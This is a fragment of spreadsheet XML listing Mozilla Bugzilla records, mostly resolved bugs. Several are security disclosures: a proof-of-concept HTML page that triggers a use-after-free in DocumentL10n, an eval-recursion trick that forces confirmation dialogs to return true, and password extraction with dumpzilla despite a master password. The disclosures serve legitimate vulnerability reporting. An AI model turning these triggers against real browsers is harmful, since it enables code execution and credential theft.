      <c r="N6121" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6121" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6121" t="inlineStr">
        <is>
          <t>[psm-assigned][post-critsmash-triage][adv-main62+]</t>
        </is>
      </c>
      <c r="Q6121" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6121" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6121" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T6121" t="n">
        <v>1</v>
      </c>
      <c r="U6121" t="n">
        <v>0</v>
      </c>
      <c r="V6121" t="n">
        <v>58</v>
      </c>
      <c r="W6121" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Build ID: 20180704192850
Steps to reproduce:
In my existing firefox 61.0.4 (Ubuntu), I added a master password to protect my passwords.
Next, I used dumpzilla (https://github.com/Busindre/dumpzilla) to extract the passwords from my closed firefox browser.
Actual results:
All my passwords got decrypted without asking for my master password.
I'm assuming protection happens on UI level but not on data level.
Expected results:
I would expect a master password to encrypt the json file using the master password so it can't be opened without knowledge of that master password.</t>
        </is>
      </c>
      <c r="X6121" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6122">
      <c r="A6122" t="n">
        <v>1410006</v>
      </c>
      <c r="B6122" t="inlineStr">
        <is>
          <t>2017-10-19 01:53:35 -0700</t>
        </is>
      </c>
      <c r="C6122" t="inlineStr">
        <is>
          <t>ESLint should automatically ignore all crashtest directories</t>
        </is>
      </c>
      <c r="D6122" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E6122" t="n">
        <v>1</v>
      </c>
      <c r="F6122" t="n">
        <v>1</v>
      </c>
      <c r="G6122" t="n">
        <v>7</v>
      </c>
      <c r="H6122" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6122" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J6122" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K6122" t="inlineStr">
        <is>
          <t>3 Branch</t>
        </is>
      </c>
      <c r="L6122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6122" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6122" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6122" t="inlineStr"/>
      <c r="Q6122" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6122" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6122" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T6122" t="n">
        <v>1</v>
      </c>
      <c r="U6122" t="n">
        <v>0</v>
      </c>
      <c r="V6122" t="n">
        <v>6</v>
      </c>
      <c r="W6122" t="inlineStr">
        <is>
          <t>All of our crash tests are a specially crafted code that originally crashed Firefox.
We shouldn't lint them, as fixing the issues might invalidate the original test case.
We're not linting any crashtest directories at the moment, but I'm hoping we're going to be enabling some areas that contain crashtests very soon.</t>
        </is>
      </c>
      <c r="X6122" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6123">
      <c r="A6123" t="n">
        <v>482123</v>
      </c>
      <c r="B6123" t="inlineStr">
        <is>
          <t>2009-03-08 05:28:06 -0700</t>
        </is>
      </c>
      <c r="C6123" t="inlineStr">
        <is>
          <t>No 20090308 nightlies for all mercurial-based builds</t>
        </is>
      </c>
      <c r="D6123" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6123" t="n">
        <v>1</v>
      </c>
      <c r="F6123" t="n">
        <v>1</v>
      </c>
      <c r="G6123" t="n">
        <v>5</v>
      </c>
      <c r="H6123" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6123" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6123" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6123" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6123" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6123" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6123" t="inlineStr"/>
      <c r="Q6123" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6123" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6123" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6123" t="n">
        <v>1</v>
      </c>
      <c r="U6123" t="n">
        <v>0</v>
      </c>
      <c r="V6123" t="n">
        <v>16</v>
      </c>
      <c r="W6123" t="inlineStr">
        <is>
          <t>nighly builds just haven't started (yet ?), right now 3 hours late.
does this have to do with the change from PST to PDT ?</t>
        </is>
      </c>
      <c r="X6123" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6124">
      <c r="A6124" t="n">
        <v>1751609</v>
      </c>
      <c r="B6124" t="inlineStr">
        <is>
          <t>2022-01-23 01:04:02 -0800</t>
        </is>
      </c>
      <c r="C6124" t="inlineStr">
        <is>
          <t>heap-use-after-free in DocumentL10n::TranslateDocument</t>
        </is>
      </c>
      <c r="D6124" t="inlineStr">
        <is>
          <t>2024-05-30 10:53:26 -0700</t>
        </is>
      </c>
      <c r="E6124" t="n">
        <v>1</v>
      </c>
      <c r="F6124" t="n">
        <v>1</v>
      </c>
      <c r="G6124" t="n">
        <v>3</v>
      </c>
      <c r="H6124" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6124" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6124" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K6124" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6124" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6124" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6124" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6124" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6124" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main99+][adv-esr91.8+]</t>
        </is>
      </c>
      <c r="Q6124" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6124" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6124" t="inlineStr">
        <is>
          <t>99 Branch</t>
        </is>
      </c>
      <c r="T6124" t="n">
        <v>1</v>
      </c>
      <c r="U6124" t="n">
        <v>0</v>
      </c>
      <c r="V6124" t="n">
        <v>25</v>
      </c>
      <c r="W6124" t="inlineStr">
        <is>
          <t>Created attachment 9260300
asan.log
# heap-use-after-free in DocumentL10n::TranslateDocument
## VERSION
Firefox 97 Nightly Build
## VULNERABILITY DETAILS
```
void Document::LocalizationLinkAdded(Element* aLinkElement) {
  if (!AllowsL10n()) {
    return;
  }
......
......
  if (!mDocumentL10n) {
    Element* elem = GetDocumentElement();
    MOZ_DIAGNOSTIC_ASSERT(elem);
    bool isSync = elem-&gt;HasAttr(nsGkAtoms::datal10nsync);
    mDocumentL10n = DocumentL10n::Create(this, isSync);
    ......
  }
  mDocumentL10n-&gt;AddResourceId(NS_ConvertUTF16toUTF8(href));
  if (mReadyState &gt;= READYSTATE_INTERACTIVE) {
    mDocumentL10n-&gt;TriggerInitialTranslation(); // **** 1 ****
  } else {
......
......
  }
}
void DocumentL10n::TriggerInitialTranslation() {
  ······
  ······
  nsTArray&lt;RefPtr&lt;Promise&gt;&gt; promises;
  ErrorResult rv;
  promises.AppendElement(TranslateDocument(rv));
  if (NS_WARN_IF(rv.Failed())) {
    InitialTranslationCompleted(false);
    mReady-&gt;MaybeRejectWithUndefined();
    return;
  }
  promises.AppendElement(TranslateRoots(rv));   // **** 2 ****
  Element* documentElement = mDocument-&gt;GetDocumentElement(); // // **** 3 ****
  ......
  ......
}
```
When an HTMLLinkElement(with rel="localization") is added to the document, the document will create 
a DocumentL10n and trigger TriggerInitialTranslation. In the path from (1) in Document::LocalizationLinkAdded to (2) in DocumentL10n::TriggerInitialTranslation, only the document hold the reference of DocumentL10n in mDocumentL10n.
In TranslateRoots(2), the function will use a Promise to resolve ErrorResult rv. If we define the Getter of "then" 
in Object's prototype before, Promise-&gt;resolve will trigger user's JS callback in TranslateRoots(2). And we can set HTMLLinkElement's rel to null to trigger Document::LocalizationLinkRemoved. It will set mDocumentL10n to nullptr and remove the reference of DocumentL10n, then we can destroy the object in gc. When the program return to TriggerInitialTranslation, it will lead to a Use-After-Free in (3)(with accessing the member variable: mDocument).
## REPRODUCTION CASE
I write a testcase to verify this vulnerability:
poc.html:
```
&lt;html data-l10n-sync&gt;
&lt;body&gt;
&lt;script type="text/javascript" &gt;
forceGC = () =&gt; {
   FuzzingFunctions.garbageCollect();
   FuzzingFunctions.cycleCollect();
   // Without enable Fuzzing:
   // new ArrayBuffer(0xfffffff);
   // alert(1);
}
var link = document.body.appendChild(document.createElement("link"));
Object.prototype.__defineGetter__("then", function() {
    link.rel = "";
    forceGC();
})
function run(){
    link.rel = "localization";
}
setTimeout(run,1000);
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## ASAN LOG
asan.log in attachment.
( It seems like that the ASAN in MacOS doesn't work well, it can't recognize the heap-use-after-free in my computer. The Use-After-Free can be verified by rdi: 0xe5e5e5e5e5e5e5e5. )
## Suggestion
Hold the reference of DocumentL10n before DocumentL10n::TriggerInitialTranslation.
## CREDIT INFORMATION
Kirin of Tencent Security Xuanwu Lab.</t>
        </is>
      </c>
      <c r="X6124" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6125">
      <c r="A6125" t="n">
        <v>234416</v>
      </c>
      <c r="B6125" t="inlineStr">
        <is>
          <t>2004-02-15 07:24:40 -0800</t>
        </is>
      </c>
      <c r="C6125" t="inlineStr">
        <is>
          <t>can spoof filename in "what should firefox do with this file" dialog</t>
        </is>
      </c>
      <c r="D6125" t="inlineStr">
        <is>
          <t>2008-07-31 01:47:29 -0700</t>
        </is>
      </c>
      <c r="E6125" t="n">
        <v>1</v>
      </c>
      <c r="F6125" t="n">
        <v>1</v>
      </c>
      <c r="G6125" t="n">
        <v>3</v>
      </c>
      <c r="H6125" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6125" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6125" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K6125" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6125" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6125" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6125" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6125" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6125" t="inlineStr">
        <is>
          <t>[sg:spoof]</t>
        </is>
      </c>
      <c r="Q6125" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6125" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6125" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6125" t="n">
        <v>1</v>
      </c>
      <c r="U6125" t="n">
        <v>0</v>
      </c>
      <c r="V6125" t="n">
        <v>15</v>
      </c>
      <c r="W6125" t="inlineStr">
        <is>
          <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040206 Firefox/0.8
1) The open file dialog box doesn't show the complete name of the file to
download, truncate it instead of wrapping it.
2) If I choose de "Open with" option without an application selection the OK
button reminds enable and if I click it, open the default application.
I'm telling this in a spoofing file extension name context like this: 
http://secunia.com/advisories/10760/
Reproducible: Always
Steps to Reproduce:
1. Go to http://secunia.com/internet_explorer_file_download_spoof/
Actual Results:  
file name truncate
OK button enable when open with selected ...
Expected Results:  
file name wrapped
OK button disabled</t>
        </is>
      </c>
      <c r="X6125" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6126">
      <c r="A6126" t="n">
        <v>616659</v>
      </c>
      <c r="B6126" t="inlineStr">
        <is>
          <t>2010-12-03 21:38:34 -0800</t>
        </is>
      </c>
      <c r="C6126" t="inlineStr">
        <is>
          <t>Recursing the JavaScript eval function over itself eventually causes all dialogs with confirmation to evaluate to "true".</t>
        </is>
      </c>
      <c r="D6126" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:53 -0700</t>
        </is>
      </c>
      <c r="E6126" t="n">
        <v>1</v>
      </c>
      <c r="F6126" t="n">
        <v>1</v>
      </c>
      <c r="G6126" t="n">
        <v>3</v>
      </c>
      <c r="H6126" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6126" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6126" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6126" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6126" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6126" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6126" t="inlineStr">
        <is>
          <t>[sg:critical] [qa-ntd-191]</t>
        </is>
      </c>
      <c r="Q6126" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6126" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6126" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6126" t="n">
        <v>0</v>
      </c>
      <c r="U6126" t="n">
        <v>0</v>
      </c>
      <c r="V6126" t="n">
        <v>38</v>
      </c>
      <c r="W6126" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-us) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Build Identifier: http://www.mozilla.com/en-US/products/download.html?product=firefox-3.6.12&amp;os=win&amp;lang=en-US
Obviously, code like eval(a="eval(a)") causes the script to error out.  But adding a try/catch block like eval(a="try{eval(a)}catch(b){/*code here*/}") lets you catch the "eval'd-out" state and execute code in it.  Any dialog box opened in this state instead shows a textless dialog box with two textless buttons, and pressing these buttons does not close this box.  Closing the box with the corner "X" button causes input boxes (confirm, onbeforeunload, netscape.security.PrivilegeManager.enablePrivilege, etc.) to evaluate to "true".
Reproducible: Always
Steps to Reproduce:
The following code will open a dialog: eval(a="try{eval(a)}catch(b){c=confirm('You will not see this text')}")
Actual Results:  
In Windows 7, the only immediate way to close the aforementioned dialog is by pressing the "X" corner button.  If the user performs this action, Firefox will proceed as if the user pressed "OK", causing c == true.
Expected Results:  
In a normal case, this action is the equivalent of pressing "Cancel", meaning c == false.
See the attachment in the comments for an example that uses this vulnerability for arbitrary code execution.</t>
        </is>
      </c>
      <c r="X6126" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6127">
      <c r="A6127" t="n">
        <v>1309571</v>
      </c>
      <c r="B6127" t="inlineStr">
        <is>
          <t>2016-10-12 07:08:33 -0700</t>
        </is>
      </c>
      <c r="C6127" t="inlineStr">
        <is>
          <t>Syncing after fresh install only pulls down history items from a month ago and beyond</t>
        </is>
      </c>
      <c r="D6127" t="inlineStr">
        <is>
          <t>2016-11-16 06:43:44 -0800</t>
        </is>
      </c>
      <c r="E6127" t="n">
        <v>1</v>
      </c>
      <c r="F6127" t="n">
        <v>1</v>
      </c>
      <c r="G6127" t="n">
        <v>2</v>
      </c>
      <c r="H6127" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6127" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J6127" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K6127" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6127" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N6127" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6127" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6127" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q6127" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6127" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6127" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6127" t="n">
        <v>1</v>
      </c>
      <c r="U6127" t="n">
        <v>0</v>
      </c>
      <c r="V6127" t="n">
        <v>22</v>
      </c>
      <c r="W6127" t="inlineStr">
        <is>
          <t>Noticed this when testing this morning on master.
STR
1. Signed into my personal FxA account on a master build of Firefox (cef88e9a6d5cf50a2e5b7acd8ad4b598aa11e04a) containing lots of history items spanning a more than a month
2. Allowed sync to finished
Expected:
Recent history items should appear under the history tab (recent = last 24 hours or so)
Actual:
History items begin at 'last month'.
------
Its also pretty noticeable for the highlights returned on the Activity Stream panel because all my highlights are a month old.</t>
        </is>
      </c>
      <c r="X6127" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6128">
      <c r="A6128" t="n">
        <v>673757</v>
      </c>
      <c r="B6128" t="inlineStr">
        <is>
          <t>2011-07-24 00:42:28 -0700</t>
        </is>
      </c>
      <c r="C6128" t="inlineStr">
        <is>
          <t>Out-of-bounds array access in nsDocAccessible::CacheChildrenInSubtree</t>
        </is>
      </c>
      <c r="D6128" t="inlineStr">
        <is>
          <t>2013-12-27 14:30:27 -0800</t>
        </is>
      </c>
      <c r="E6128" t="n">
        <v>1</v>
      </c>
      <c r="F6128" t="n">
        <v>1</v>
      </c>
      <c r="G6128" t="n">
        <v>3</v>
      </c>
      <c r="H6128" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6128" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6128" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K6128" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6128" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6128" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6128" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6128" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6128" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q6128" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6128" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6128" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T6128" t="n">
        <v>0</v>
      </c>
      <c r="U6128" t="n">
        <v>0</v>
      </c>
      <c r="V6128" t="n">
        <v>26</v>
      </c>
      <c r="W6128" t="inlineStr">
        <is>
          <t>Created attachment 547987
testcase (crashes Firefox when loaded, if accessibility is enabled)
1. Enable accessibility, e.g. by pasting the following into the js console:
Components.classes["@mozilla.org/accessibilityService;1"]
      .getService(Components.interfaces.nsIAccessibleRetrieval);
2. Load the testcase.
Result: "ASSERTION: invalid array index" in nsTArray::ElementAt (nb: NOT SafeElementAt) followed by a crash [@ nsAccessNode::IsContent].
Both are called by nsDocAccessible::CacheChildrenInSubtree, so I assume that's closer to where the bug is.
In debug builds it usually crashes near 0x0, but in opt builds it's clearly exploitable (bp-aad90a7b-4402-40f4-bd6d-92a4d2110724).</t>
        </is>
      </c>
      <c r="X6128" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6129">
      <c r="A6129" t="n">
        <v>465505</v>
      </c>
      <c r="B6129" t="inlineStr">
        <is>
          <t>2008-11-18 04:24:15 -0800</t>
        </is>
      </c>
      <c r="C6129" t="inlineStr">
        <is>
          <t>CompareBloatLogs and CompareLeakLogs should fail gracefully when a BuildProperty isn't set</t>
        </is>
      </c>
      <c r="D6129" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6129" t="n">
        <v>1</v>
      </c>
      <c r="F6129" t="n">
        <v>1</v>
      </c>
      <c r="G6129" t="n">
        <v>5</v>
      </c>
      <c r="H6129" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6129" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6129" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6129" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6129" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6129" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6129" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6129" t="inlineStr"/>
      <c r="Q6129" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6129" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6129" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6129" t="n">
        <v>1</v>
      </c>
      <c r="U6129" t="n">
        <v>0</v>
      </c>
      <c r="V6129" t="n">
        <v>6</v>
      </c>
      <c r="W6129" t="inlineStr">
        <is>
          <t>We got into a state in our staging environment where logs from trace-malloc runs were only partly uploaded. This caused the CompareLeakLogs step to have a Build Exception when trying to analyze the previous run's log. What sucks about this is that Build Exceptions will halt a build regardless of the haltOnFailure parameter. These steps should somehow detect when they can't retrieve a property and simply set their status as FAILURE.</t>
        </is>
      </c>
      <c r="X6129" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6130">
      <c r="A6130" t="n">
        <v>1250849</v>
      </c>
      <c r="B6130" t="inlineStr">
        <is>
          <t>2016-02-24 03:14:58 -0800</t>
        </is>
      </c>
      <c r="C6130" t="inlineStr">
        <is>
          <t>Close hooks &amp; other listeners are added each time the panel is opened</t>
        </is>
      </c>
      <c r="D6130" t="inlineStr">
        <is>
          <t>2016-04-26 14:38:39 -0700</t>
        </is>
      </c>
      <c r="E6130" t="n">
        <v>1</v>
      </c>
      <c r="F6130" t="n">
        <v>1</v>
      </c>
      <c r="G6130" t="n">
        <v>6</v>
      </c>
      <c r="H6130" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6130" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J6130" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K6130" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6130" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6130" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6130" t="inlineStr">
        <is>
          <t>[btpp-fix-now][47]</t>
        </is>
      </c>
      <c r="Q6130" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6130" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6130" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6130" t="n">
        <v>1</v>
      </c>
      <c r="U6130" t="n">
        <v>0</v>
      </c>
      <c r="V6130" t="n">
        <v>4</v>
      </c>
      <c r="W6130" t="inlineStr">
        <is>
          <t>We've just been debugging some issues around the panel.
We noticed that in bootstrap.js LoopUI -&gt; openPanel we're re-adding the listeners every time the window is open (i.e. calling hookWindowCloseForPanelClose, addMessageListener etc).
We should put in some protection to stop that, and to remove the listeners on shutdown.
Note: bug 1229352 is affecting some of the panel unloading process, so we fix some of this in that, or wait until that is completed.</t>
        </is>
      </c>
      <c r="X6130" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6131">
      <c r="A6131" t="n">
        <v>505305</v>
      </c>
      <c r="B6131" t="inlineStr">
        <is>
          <t>2009-07-20 12:40:42 -0700</t>
        </is>
      </c>
      <c r="C6131" t="inlineStr">
        <is>
          <t>Probably Exploitable - Read Access Violation on Block Data Move starting at MSVCR80D!memcpy+0x000000000000005a</t>
        </is>
      </c>
      <c r="D6131" t="inlineStr">
        <is>
          <t>2013-02-07 05:15:58 -0800</t>
        </is>
      </c>
      <c r="E6131" t="n">
        <v>1</v>
      </c>
      <c r="F6131" t="n">
        <v>1</v>
      </c>
      <c r="G6131" t="n">
        <v>3</v>
      </c>
      <c r="H6131" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6131" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6131" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6131" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L6131" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6131" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6131" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6131" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6131" t="inlineStr">
        <is>
          <t>[needs 1.8 landing][sg:critical?]</t>
        </is>
      </c>
      <c r="Q6131" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6131" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6131" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6131" t="n">
        <v>1</v>
      </c>
      <c r="U6131" t="n">
        <v>0</v>
      </c>
      <c r="V6131" t="n">
        <v>22</v>
      </c>
      <c r="W6131" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.1pre) Gecko/20090716
Shiretoko/3.5.1pre
Steps to reproduce:
-Load : http://www.donorschoose.org/donors/
search.html?page=9&amp;keywords=music&amp;max=50
-&gt; Crash
(eb4.ac0): Access violation - code c0000005 (!!! second chance !!!)
eax=04b4d0da ebx=7ffd4000 ecx=3f6fdc36 edx=00000002 esi=06f56000 edi=06f47208
eip=1023d53a esp=0012e240 ebp=0012e248 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
-
MSVCR80D!memcpy+0x5a:
1023d53a f3a5            rep movs dword ptr es:[edi],dword ptr [esi] es:0023:06f47208=dddddddd ds:0023:06f56000=????????
0:000&gt; cdb: Reading initial command '!load winext\msec.dll;.logappend;!exploitable;k;q'
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at MSVCR80D!memcpy+0x000000000000005a (Hash=0x6e021839.0x70393e49)
This is a read access violation in a block data move, and is therefore classified as probably exploitable.
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e248 005ad1a4 MSVCR80D!memcpy+0x5a
0012e28c 005ac540 js3250!do_replace+0x134
0012e310 005ac1a2 js3250!js_StringReplaceHelper+0x370
0012e334 0051aeba js3250!str_replace+0x82
0012ea64 0050709c js3250!js_Interpret+0x1179a
0012eb40 00507962 js3250!js_Invoke+0x95c
0012eb64 004b30ed js3250!js_InternalInvoke+0x82
0012eb8c 03016620 js3250!JS_CallFunctionValue+0x5d
0012ec3c 0307a2d9 gklayout!nsJSContext::CallEventHandler+0x2a0
0012eeb0 02ecee75 gklayout!nsJSEventListener::HandleEvent+0x10d9
0012ef9c 02ecf288 gklayout!nsEventListenerManager::HandleEventSubType+0x195
0012f010 02ed2ec0 gklayout!nsEventListenerManager::HandleEvent+0x398
0012f050 02ed3104 gklayout!nsEventTargetChainItem::HandleEvent+0x130
0012f08c 02ed381e gklayout!nsEventTargetChainItem::HandleEventTargetChain+0x194
